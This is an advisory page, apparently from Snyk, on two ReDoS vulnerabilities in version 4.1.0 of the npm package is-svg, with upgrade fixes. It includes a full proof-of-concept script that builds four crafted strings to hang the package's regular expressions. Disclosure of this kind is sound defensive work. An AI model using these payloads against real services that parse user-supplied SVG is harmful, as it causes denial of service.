is-svg@4.1.0 vulnerabilities

Check if a string is SVG

  • latest version

    5.1.0

  • latest non vulnerable version

  • first published

    10 years ago

  • latest version published

    4 months ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the is-svg package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Regular Expression Denial of Service (ReDoS)

    is-svg is a Check if a string or buffer is SVG

    Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the removeDtdMarkupDeclarations and entityRegex regular expressions, bypassing the fix for CVE-2021-28092.

    PoC by Yeting Li

    //1) 1st ReDoS caused by the two sub-regexes [A-Z]+ and [^>]* in `removeDtdMarkupDeclarations`.
    const isSvg = require('is-svg');
    function build_attack1(n) {
    var ret = '<!'
    for (var i = 0; i < n; i++) {
    ret += 'DOCTYPE'
    }
    
    return ret+"";
    }
    for(var i = 1; i <= 50000; i++) {
       if (i % 10000 == 0) {
           var time = Date.now();
           var attack_str = build_attack1(i);
           isSvg(attack_str);
    
           var time_cost = Date.now() - time;
           console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
     }
    }
    
    //2) 2nd ReDoS caused by ? the first sub-regex  \s*  in `entityRegex`.
    function build_attack2(n) {
    var ret = ''
    for (var i = 0; i < n; i++) {
    ret += ' '
    }
    
    return ret+"";
    }
    for(var i = 1; i <= 50000; i++) {
       if (i % 10000 == 0) {
           var time = Date.now();
           var attack_str = build_attack2(i);
           isSvg(attack_str);
    
           var time_cost = Date.now() - time;
           console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
     }
    }
    
    
    //3rd ReDoS caused by the sub-regex \s+\S*\s*  in `entityRegex`.
    function build_attack3(n) {
    var ret = '<!Entity'
    for (var i = 0; i < n; i++) {
    ret += ' '
    }
    
    return ret+"";
    }
    for(var i = 1; i <= 50000; i++) {
       if (i % 10000 == 0) {
           var time = Date.now();
           var attack_str = build_attack3(i);
           isSvg(attack_str);
    
           var time_cost = Date.now() - time;
           console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
     }
    }
    
    //4th ReDoS caused by the sub-regex \S*\s*(?:"|')[^"]+  in `entityRegex`.
    function build_attack4(n) {
    var ret = '<!Entity '
    for (var i = 0; i < n; i++) {
    ret += '\''
    }
    
    return ret+"";
    }
    for(var i = 1; i <= 50000; i++) {
       if (i % 10000 == 0) {
           var time = Date.now();
           var attack_str = build_attack4(i);
           isSvg(attack_str);
    
           var time_cost = Date.now() - time;
           console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
     }
    }
    

    How to fix Regular Expression Denial of Service (ReDoS)?

    Upgrade is-svg to version 4.3.0 or higher.

    >=2.1.0 <4.3.0
    • M
    Regular Expression Denial of Service (ReDoS)

    is-svg is a Check if a string or buffer is SVG

    Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input for a very long time.

    You are only affected if you use this package on a server that accepts SVG as user-input.

    How to fix Regular Expression Denial of Service (ReDoS)?

    Upgrade is-svg to version 4.2.2 or higher.

    >=2.1.0 <4.2.2